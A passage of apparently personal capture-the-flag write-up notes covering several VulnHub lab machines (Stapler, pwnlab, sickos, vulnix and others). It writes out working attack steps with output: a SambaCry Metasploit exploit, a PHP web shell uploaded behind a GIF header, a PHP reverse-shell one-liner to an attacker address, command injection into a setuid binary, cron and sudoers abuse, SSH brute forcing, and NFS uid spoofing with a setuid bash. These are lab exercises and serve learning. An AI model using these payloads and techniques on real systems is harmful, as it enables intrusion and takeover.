-rwxrwxrwx  1 admin     admin     85304 Nov 18  2015 ps
-rw-r--r--  1 fristigod fristigod    25 Nov 19  2015 whoisyourgodnow.txt
```

- The cron job runs whatever is in `/tmp/runthis` as admin every minute, so one line of `chmod -R 777 /home/admin` opens up admin's home
- Look at `cryptedpass.txt` together with `cryptpass.py`
    - The scheme is base64 -> reverse -> rot13
    - Undo it in the opposite order: rot13 -> reverse -> base64 decode. The string fed in below is the content of `whoisyourgodnow.txt` with the rot13 step already undone, so `rev | base64 -d` finishes the job

```=bash
[admin@localhost ~]$ echo =ESa0NXayZUZCVmclhGV0VGT|rev|base64 -d
LetThereBeFristi![admin@localhost ~]$ ls -al
[admin@localhost ~]$ su fristigod
Password: LetThereBeFristi!
bash-4.1$ sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User fristigod may run the following commands on this host:
    (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$ /var/fristigod/.secret_admin_stuff/doCom d
Nice try, but wrong user ;)
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
bash-4.1# id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
bash-4.1# ls /root
fristileaks_secrets.txt
bash-4.1# cat /root/f*
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)

Flag: Y0u_kn0w_y0u_l0ve_fr1st1

bash-4.1#
```

- Getting root at the end was actually quick
- The password was easy: `cryptpass.py` is a huge hint, and the rest is basic crypto. If rot13 and base64 are not recognizable on sight, it is worth revisiting the fundamentals
- The trick is in `sudo -l`: the rule names a target user (`fristi`), so the binary refuses to run as the current user even though `sudo` is permitted; it has to be invoked with `sudo -u fristi`
- Nothing else is especially tricky
- It is rated at about four hours; this took roughly one. No step was a long stall and there is little guesswork; each stage leaves a proper clue to the next

# Stapler

## nmap

```=1
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-18 02:42 CST
Nmap scan report for 172.20.10.3
Host is up (0.028s latency).
Not shown: 992 filtered ports
PORT     STATE  SERVICE
20/tcp   closed ftp-data
21/tcp   open   ftp
22/tcp   open   ssh
53/tcp   open   domain
80/tcp   open   http
139/tcp  open   netbios-ssn
666/tcp  open   doom
3306/tcp open   mysql

Nmap done: 1 IP address (1 host up) scanned in 7.69 seconds
```

- 80
    - dirsearch
        - .profile
        - .bashrc
        - .bash_logout
- ftp: anonymous login shows one file
    - note
        - `Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.`
- Port 666
    - Serves a zip
    - It unpacks to a single file, an image
        - ![](https://i.imgur.com/uLkzMVF.jpg)
- Port 139
    - Anonymous login works
    - Two shares are visible
        - tmp
        - The other one lets you download a wordpress tree
            - Check the wordpress files for DB credentials, since 3306 is open
            - Nothing: there is no config in it
    - Use msf to fingerprint the version
        - Samba 4.3.9-Ubuntu
    - Search for an exploit
        - http://vinc.top/2017/05/27/samba%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/
            - This one applies
        - CVE-2017-7494
            - https://github.com/opsxcq/exploit-CVE-2017-7494
            - SambaCry: a client that can write to a share uploads a shared object and makes smbd load it by opening it as a named pipe. The msf module `is_known_pipename` does exactly that and needs a writable share, which `tmp` provides

## SMB exploit

```=bash
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 172.20.10.3
RHOSTS => 172.20.10.3
msf auxiliary(scanner/smb/smb_version) > exploit

[*] 172.20.10.3:139   - Host could not be identified: Windows 6.1 (Samba 4.3.9-Ubuntu)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_version) >
msf auxiliary(scanner/smb/pipe_auditor) > use exploit/linux/samba/is_known_pipename
msf exploit(linux/samba/is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOST                            yes       The target address
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Interact)


msf exploit(linux/samba/is_known_pipename) > set RHOST 172.20.10.3
RHOST => 172.20.10.3
msf exploit(linux/samba/is_known_pipename) > exploit

[-] 172.20.10.3:445 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (172.20.10.3:445).
[*] Exploit completed, but no session was created.

# the module defaults to 445, but nmap only showed 139 open on this box
msf exploit(linux/samba/is_known_pipename) > set RPORT 139
RPORT => 139
msf exploit(linux/samba/is_known_pipename) > exploit

[*] 172.20.10.3:139 - Using location \\172.20.10.3\tmp\ for the path
[*] 172.20.10.3:139 - Retrieving the remote path of the share 'tmp'
[*] 172.20.10.3:139 - Share 'tmp' has server-side path '/var/tmp
[*] 172.20.10.3:139 - Uploaded payload to \\172.20.10.3\tmp\InMPOtCG.so
[*] 172.20.10.3:139 - Loading the payload from server-side path /var/tmp/InMPOtCG.so using \\PIPE\/var/tmp/InMPOtCG.so...
[-] 172.20.10.3:139 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 172.20.10.3:139 - Loading the payload from server-side path /var/tmp/InMPOtCG.so using /var/tmp/InMPOtCG.so...
[-] 172.20.10.3:139 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 172.20.10.3:139 - Uploaded payload to \\172.20.10.3\tmp\bceKRtMm.so
[*] 172.20.10.3:139 - Loading the payload from server-side path /var/tmp/bceKRtMm.so using \\PIPE\/var/tmp/bceKRtMm.so...
[-] 172.20.10.3:139 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 172.20.10.3:139 - Loading the payload from server-side path /var/tmp/bceKRtMm.so using /var/tmp/bceKRtMm.so...
[+] 172.20.10.3:139 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (172.20.10.8:57342 -> 172.20.10.3:139) at 2019-03-18 03:45:06 +0800

id
uid=0(root) gid=0(root) groups=0(root)
python -c 'import pty;pty.spawn("/bin/bash")'
root@red:/tmp# ls
root@red:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@red:/tmp# cd /root
root@red:/root# ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
root@red:/root# cat fl*
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
root@red:/root#
```

- The payload is loaded into smbd, which runs as root, so the session is root from the start; no separate privilege escalation is needed

## Postscript

- The web site turned out to be empty: the `/home/www` it serves holds exactly the three files dirsearch found
- Other routes in are probably worth studying later

# pwnlab

## nmap

```
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
```

## php

- LFI
    - The `lang` cookie is used to include a file, so it reads arbitrary files
    - `lang=../../../../etc/passwd`
    - ![](https://i.imgur.com/mIPt4Wr.png)
    - `config.php` contains the database credentials
        - root/H4u%QJ_H99
- database (3306 is open, so log in with them)

```
show databases;
use Users;
select * from users;
```

![](https://i.imgur.com/xsPUkJg.png)

## upload and get shell

- upload
    - Bypass via a GIF header: the body starts with the `GIF` magic bytes and the name ends in `.gif`, so the upload check accepts it, but the PHP after the header is still there

```=html
-----------------------------381804318928229381999855955
Content-Disposition: form-data; name="file"; filename="poc.php.gif"
Content-Type: image/jpeg

GIF
<?php die(`$_GET[s];`)?>
-----------------------------381804318928229381999855955
Content-Disposition: form-data; name="submit"

Upload
-----------------------------381804318928229381999855955--

Response
<img src="upload/79465d1be78b859624c6b7877f374e6c.gif"><br /></center>
```

- LFI
    - `lang=../upload/79465d1be78b859624c6b7877f374e6c.gif`
    - The LFI includes the uploaded "image", so its PHP executes and the `s` parameter becomes a shell command
- getshell

```=1
GET /?s=ls HTTP/1.1
Host: 172.20.10.4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=h8513mm6nhlvpmbmiao3e05rr2; lang=../upload/79465d1be78b859624c6b7877f374e6c.gif
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

HTTP/1.1 200 OK
Date: Mon, 18 Mar 2019 14:39:19 GMT
Server: Apache/2.4.10 (Debian)
Content-Length: 61
Connection: close
Content-Type: text/html; charset=UTF-8

GIF
config.php
images
index.php
login.php
upload
upload.php
```

## reverse shell

- Same request, but `s` now carries a PHP one-liner that opens a socket back to 172.20.10.8:1234 and attaches `/bin/sh -i` to it; the `lang` cookie still points at the uploaded file so the include happens on this request too

```=1
GET /?s=php+-r+'%24sock%3Dfsockopen("172.20.10.8"%2C1234)%3Bexec("%2Fbin%2Fsh+-i+<%263+>%263+2>%263")%3B' HTTP/1.1
Host: 172.20.10.4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=h8513mm6nhlvpmbmiao3e05rr2; lang=../upload/79465d1be78b859624c6b7877f374e6c.gif
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
```

```=python
python -c 'import pty;pty.spawn("/bin/bash")'
```

## root

- Not very familiar with this part; it took a while to think of `$PATH`
- Under kane's home there is an executable, `msgmike`, that runs `cat /home/mike/msg.txt`
- Since `cat` is not called by absolute path, putting a directory of our own first in `$PATH` should make it execute some other binary instead

```=linux
export PATH=.:$PATH
cat /bin/sh > ./cat
chmod 777 cat
./msgmike
```

- That did not do what was intended: it ends up doing the equivalent of `bash /home/mike/msg.txt`, which is useless

```=linux
cat zzzzz> ./cat
./msgmike
./cat: 1: ./cat: zzzzz: not found
cat "/bin/sh" > cat
cat: 0: Can't open /home/mike/msg.txt
echo "/bin/bash" > cat
./msgmike
mike@pwnlab:~$ id
uid=1002(mike) gid=1002(mike) groups=1002(mike),1003(kane)
mike@pwnlab:~$
```

- That worked, though at first it was unclear why the `/bin/sh` attempt had not
- The reason: `cat` had been typed where `echo` was meant. `cat /bin/sh > ./cat` copies the shell binary itself, so `msgmike`'s `cat /home/mike/msg.txt` runs `msg.txt` as a shell script (hence the "Can't open" noise). `echo "/bin/bash" > cat` makes a one-line script that ignores its argument and simply starts an interactive bash as mike
- msg2root
    - Check it with `strings`

```=1
.....
Message for root: 
/bin/echo %s >> /root/messages.txt
;*2$"(
GCC: (Debian 4.9.2-10) 4.9.2
GCC: (Debian 4.8.4-1) 4.8.4
.symtab
.....
```

- So it formats our input into `/bin/echo %s >> /root/messages.txt` and hands the string to a shell; the message is never quoted or escaped
- Terminate the `echo` with a shell metacharacter and whatever follows runs with the binary's privileges (it is setuid root, as the `euid=0` below shows)
- A pipe alone turned out not to be it; the semicolon is what gives a usable shell. With `|/bin/sh -i` a shell does start (the `#` prompt is written to stderr), but its stdout is still redirected into `/root/messages.txt`, so nothing comes back. With `;/bin/sh;` the `echo` is terminated first and `/bin/sh` keeps the terminal as its stdout

```=linux
mike@pwnlab:/home/mike$ ./msg2root
Message for root: |/bin/sh
mike@pwnlab:/home/mike$ ./msg2root
Message for root: ./msg2root
mike@pwnlab:/home/mike$ ./msg2root
Message for root: |/bin/sh &&
mike@pwnlab:/home/mike$ ./msg2root
Message for root: |/bin/sh -i
#
mike@pwnlab:/home/mike$ ./msg2root
Message for root: |/bin/sh -i;
#
mike@pwnlab:/home/mike$ ./msg2root
Message for root: ;/bin/sh;
# id
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
# whoami
root
#
```

# sickos

## nmap

```
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

## dirsearch

- `[13:19:02] 200 - 1KB - /test/`
    - Nothing in it
    - Check the allowed methods with `OPTIONS`
        - `PUT` is allowed

## Upload PHP and get a reverse shell

- `PUT` a PHP reverse shell into `/test/` and request it

## shell

- `uname -a`
    - `Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux`
    - Found two kernel privesc exploits; neither worked
- Look in `/home` for anything odd
    - There is `john`, but no permission to read the shell history
- `/etc/passwd`
    - Only `john`
- Look at the crontabs
    - `/etc/cron.daily/` has a lot of entries
    - Search for exploits against them
    - https://www.exploit-db.com/exploits/33899
        - chkrootkit 0.49 executes a file named `/tmp/update` as root if it exists; this looks usable, so test it
- Running `./chkrootkit` by hand as www-data proves nothing by itself; it is the root cron job that executes `/tmp/update`. The `123123` file appearing owned by root is the confirmation

```
www-data@ubuntu:/etc/cron.daily$ echo "touch /tmp/123123" > /tmp/update
www-data@ubuntu:/etc/cron.daily$ ./chkrootkit
www-data@ubuntu:/etc/cron.daily$ ls /tmp
123  cve_2016_0728.c  meow  meow.c  meow2.c  php.socket-0  update
www-data@ubuntu:/etc/cron.daily$ ls /tmp
123  123123  cve_2016_0728.c  meow  meow.c  meow2.c  php.socket-0  update
www-data@ubuntu:/etc/cron.daily$ ls -al /tmp
total 60
drwxrwxrwt  2 root     root      4096 Mar 22 23:07 .
drwxr-xr-x 22 root     root      4096 Mar 30  2016 ..
-rw-r--r--  1 www-data www-data 10189 Mar 22 22:42 123
-rw-r--r--  1 root     root         0 Mar 22 23:07 123123
-rw-r--r--  1 www-data www-data  4500 Mar 22 23:01 cve_2016_0728.c
-rwxr-xr-x  1 www-data www-data 12101 Mar 22 22:55 meow
-rw-r--r--  1 www-data www-data  6382 Mar 22 22:52 meow.c
-rw-r--r--  1 www-data www-data  6242 Mar 22 22:55 meow2.c
srwxr-xr-x  1 www-data www-data     0 Mar 23  2019 php.socket-0
-rwxr-xr-x  1 www-data www-data    18 Mar 22 23:05 update
```

- It works: `123123` is owned by root, so `/tmp/update` really does run as root. From here there are plenty of ways up; the one used here is to make `/etc/sudoers` writable, append a rule, and run `sudo /bin/bash`

```
www-data@ubuntu:/etc/cron.daily$ echo "chmod 777 /etc/sudoers" > /tmp/update
www-data@ubuntu:/etc/cron.daily$ cat /tmp/update
chmod 777 /etc/sudoers
www-data@ubuntu:/etc/cron.daily$ ./chkrootkit
www-data@ubuntu:/etc/cron.daily$ echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers
www-data@ubuntu:/etc/cron.daily$ cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults	env_reset
Defaults	secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root	ALL=(ALL:ALL) ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
%sudo	ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d
www-data ALL=NOPASSWD: ALL
www-data@ubuntu:/etc/cron.daily$ sudo /bin/sh
sudo: /etc/sudoers is mode 0777, should be 0440
sudo: no valid sudoers sources found, quitting
sudo: unable to initialize policy plugin
www-data@ubuntu:/etc/cron.daily$ sudo /bin/bash
sudo: /etc/sudoers is mode 0777, should be 0440
sudo: no valid sudoers sources found, quitting
sudo: unable to initialize policy plugin
www-data@ubuntu:/etc/cron.daily$ echo "chmod 0440 /etc/sudoers" > /tmp/update
www-data@ubuntu:/etc/cron.daily$ cat /tmp/update
chmod 0440 /etc/sudoers
www-data@ubuntu:/etc/cron.daily$ ./chkrootkit
www-data@ubuntu:/etc/cron.daily$ ls -al /etc/sudoers
-rwxrwxrwx 1 root root 750 Mar 22 23:14 /etc/sudoers
www-data@ubuntu:/etc/cron.daily$ ./chkrootkit
www-data@ubuntu:/etc/cron.daily$ ls -al /etc/sudoers
-r--r----- 1 root root 750 Mar 22 23:14 /etc/sudoers
www-data@ubuntu:/etc/cron.daily$ sudo /bin/bash
root@ubuntu:/etc/cron.daily# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/etc/cron.daily# cd /root
root@ubuntu:~# ls
304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz  7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
chkrootkit-0.49                                           newRule
root@ubuntu:~# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

Thanks for giving this try.

@vulnhub: Thanks for hosting this UP!.
root@ubuntu:~#
```

- `sudo` refuses to use a sudoers file whose mode is not 0440, so after appending the rule the mode has to be set back through the same `/tmp/update` trick; the first `ls -al` still shows 0777 because the cron job had not run yet

# vulnix

## nmap

```
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-26 16:16 CST
Nmap scan report for 172.20.10.2
Host is up (0.0013s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
79/tcp   open  finger
110/tcp  open  pop3
111/tcp  open  rpcbind
143/tcp  open  imap
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
993/tcp  open  imaps
995/tcp  open  pop3s
2049/tcp open  nfs

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
```

- Plenty of services; at first glance a mail server. Poke at it a little more before deciding
- 513, 514 and 2049 are the interesting names, so try them first
    - 513 and 514 give no response to `nc`
    - 2049 is NFS (network file system); try Metasploit
        - Reference: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/nfs/nfsmount.md

```
./msfconsole
use auxiliary/scanner/nfs/nfsmount
set RHOSTS 172.20.10.2
msf auxiliary(scanner/nfs/nfsmount) > exploit

[+] 172.20.10.2:111       - 172.20.10.2 NFS Export: /home/vulnix [*]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

- So there is an exported `/home/vulnix`
- Confirm with nmap

```
nmap -p 111 --script=nfs-showmount 172.20.10.2
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-26 16:26 CST
Nmap scan report for 172.20.10.2
Host is up (0.00082s latency).
PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount:
|_  /home/vulnix *

Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
```

- Good, this looks like an interesting directory (the `*` means the export is open to any client address); mount it and have a look
    - `mount -t nfs 172.20.10.2:/home/vulnix <your mount point>`
    - `drwxr-x--- 2 2008 2008 4096 Sep 3 2012 temp`
    - No permission: the directory belongs to uid 2008 and is not world-readable. Park it and try something else
- Port 79
    - `finger` lets you look up users

```
nc 172.20.10.2 79
user
Login: user                             Name: user
Directory: /home/user                   Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Login: dovenull                         Name: Dovecot login user
Directory: /nonexistent                 Shell: /bin/false
Never logged in.
No mail.
No Plan.

nc 172.20.10.2 79
root
Login: root                             Name: root
Directory: /root                        Shell: /bin/bash
Never logged in.
No mail.
No Plan.

nc 172.20.10.2 79
vulnix
Login: vulnix                           Name:
Directory: /home/vulnix                 Shell: /bin/bash
Never logged in.
No mail.
No Plan.
```

- That gives a rough user list: `user`, `vulnix` and dear `root`
- Brute-force their ssh passwords

```
hydra -l vulnix -P rockyou.txt -t 10 ssh://172.20.10.2
hydra -l user -P rockyou.txt -t 10 ssh://172.20.10.2

Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-03-26 16:45:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 14344398 login tries (l:1/p:14344398), ~1434440 tries per task
[DATA] attacking ssh://172.20.10.2:22/
[STATUS] 110.00 tries/min, 110 tries in 00:01h, 14344288 to do in 2173:23h, 10 active
[STATUS] 78.67 tries/min, 236 tries in 00:03h, 14344162 to do in 3039:02h, 10 active
[STATUS] 72.86 tries/min, 510 tries in 00:07h, 14343888 to do in 3281:17h, 10 active
[22][ssh] host: 172.20.10.2   login: user   password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-03-26 16:52:15
```

- Slow. While waiting, found what looked like a usable `finger` exploit
    - https://zarsec2.wordpress.com/2018/07/29/command-injection-using-finger-service/
    - Did not work

## shell

- The brute force hit: user/letmein. Log in
- `find /etc -perm -2 ! -type l -ls 2>/dev/null` (world-writable files under `/etc`)
    - None
- gcc, g++
    - Not installed
- `sudo -l`
    - Nothing
- `ps axu`
    - Nothing suspicious
- `uname -a`
    - Nothing useful, and with no gcc or g++ a kernel exploit would have to be built elsewhere anyway

## Back to the NFS export

- `drwxr-x--- 2 2008 2008 4096 Sep 3 2012 temp`
    - Very suggestive: 2008 is a uid the client cannot map to a name, and the owner of `/home/vulnix` on the target is vulnix
    - NFSv3 with AUTH_SYS trusts whatever uid the client presents, so the check can be satisfied from our side
    - Create a local user named vulnix with uid 2008, then mount the export and access it as that user

```
useradd -u 2008 vulnix
usermod -s /bin/bash -u 2008 -l vulnix vulnix
vulnix@red:/tmp$ sudo mount -t nfs 172.20.10.2:/home/vulnix /tmp/mnt

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for vulnix: vulnix
vulnix is not in the sudoers file.  This incident will be reported.
## vulnix has no sudo rights; switch back to root and fix that
## (this box is only a throwaway jump host anyway)
root@red:/tmp# echo "vulnix ALL=(ALL:ALL) ALL">>/etc/sudoers
root@red:/tmp# su vulnix
vulnix@red:/tmp$ sudo mount 172.20.10.2:/home/vulnix /tmp/mnt
mount: wrong fs type, bad option, bad superblock on 172.20.10.2:/home/vulnix,
       missing codepage or helper program, or other error
       (for several filesystems (e.g. nfs, cifs) you might
       need a /sbin/mount.<type> helper program)

       In some cases useful info is found in syslog - try
       dmesg | tail or so.
vulnix@red:/tmp$ sudo aptitude install nfs-common
## install output omitted
## searched online: the missing helper is mount.nfs, and nothing works until nfs-common is installed
vulnix@red:/tmp$ sudo mount -t nfs 172.20.10.2:/home/vulnix /tmp/mnt
vulnix@red:/tmp$ ls -al
total 36
drwxrwxrwt  8 root   root   4096 Mar 26 20:45 .
drwxr-xr-x 22 root   root   4096 Jun  7  2016 ..
drwxrwxrwt  2 root   root   4096 Mar 26 20:33 .font-unix
drwxrwxrwt  2 root   root   4096 Mar 26 20:33 .ICE-unix
-rw-rw-rw-  1 root   root     11 Mar 26 20:40 meow
drwxr-x---  2 vulnix vulnix 4096 Sep  2  2012 mnt
drwxrwxrwt  2 root   root   4096 Mar 26 20:33 .Test-unix
drwxrwxrwt  2 root   root   4096 Mar 26 20:33 .X11-unix
drwxrwxrwt  2 root   root   4096 Mar 26 20:33 .XIM-unix
## the mount point now shows owner vulnix instead of 2008, because uid 2008 resolves locally
vulnix@red:/tmp$ cd mnt
vulnix@red:/tmp/mnt$ ls -al
total 20
drwxr-x--- 2 vulnix vulnix 4096 Sep  2  2012 .
drwxrwxrwt 8 root   root   4096 Mar 26 20:45 ..
-rw-r--r-- 1 vulnix vulnix  220 Apr  3  2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr  3  2012 .bashrc
-rw-r--r-- 1 vulnix vulnix  675 Apr  3  2012 .profile
```

- The share is now mounted and readable and writable as uid 2008, which is vulnix on the target. Since this is vulnix's home directory, dropping an ssh public key into `.ssh/authorized_keys` gives passwordless login

```
mkdir .ssh
echo "<your ssh public key>" > .ssh/authorized_keys
ssh -i ~/.ssh/id_rsa vulnix@172.20.10.2
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Tue Mar 26 10:19:13 GMT 2019

  System load:  0.03              Processes:           93
  Usage of /:   90.3% of 773MB   Users logged in:     1
  Memory usage: 3%                IP address for eth0: 172.20.10.2
  Swap usage:   0%

  => / is using 90.3% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
```

- Logged in as an ordinary user

## user to root

- `sudo -l`

```
Matching 'Defaults' entries for vulnix on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:
    (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
vulnix@vulnix:~$ sudoedit /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#		to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix    *(rw,no_root_squash)
```

- vulnix may edit `/etc/exports` as root. Add `no_root_squash` to the export (the last line above is the edited version): with it, root on the client is treated as root on the share
- Without it, the default `root_squash` maps the client's root to the anonymous user, so root on the client gets no more than nobody would
- Reboot the VM so the new export takes effect, then mount again. Copy a `bash` binary in as root, make it setuid root, and run it on the target as vulnix with `-p` so bash keeps the effective uid instead of dropping it

```
mount: only root can use "--types" option
vulnix@red:/tmp$ sudo mount -t nfs 172.20.10.2:/home/vulnix /tmp/123123
root@red:/tmp/123123# cp /bin/bash .
root@red:/tmp/123123# ls
bash  sudoedit
root@red:/tmp/123123# ls -al
total 2004
drwxr-x--- 4 vulnix vulnix    4096 Mar 26 14:25 .
drwxrwxrwt 9 root   root      4096 Mar 26 22:06 ..
-rwxr-xr-x 1 root   root   1109520 Mar 26 14:25 bash
-rw------- 1 vulnix vulnix     198 Mar 26 14:14 .bash_history
drwx------ 2 vulnix vulnix    4096 Mar 26 13:39 .cache
drwxrwxr-x 2 vulnix vulnix    4096 Mar 26 13:38 .ssh
-rwxr-xr-x 1 vulnix vulnix  920788 Mar 26 14:13 sudoedit
root@red:/tmp/123123# chmod 7555 bash
root@red:/tmp/123123# ls
bash  sudoedit

## log in as vulnix on the target
vulnix@vulnix:~$ ./bash -l
bash-4.3$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
bash-4.3$ exit
logout
vulnix@vulnix:~$ ./bash -p
bash-4.3# id
uid=2008(vulnix) gid=2008(vulnix) euid=0(root) egid=0(root) groups=0(root),2008(vulnix)
bash-4.3# cd /root
bash-4.3# ls
trophy.txt
bash-4.3# cat trophy.txt
cc614640424f5bd60ce5d5264899c3be
```

# VulnOSv2

## nmap

```
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-28 00:22 CST
Nmap scan report for 172.20.10.2
Host is up (0.0040s latency).
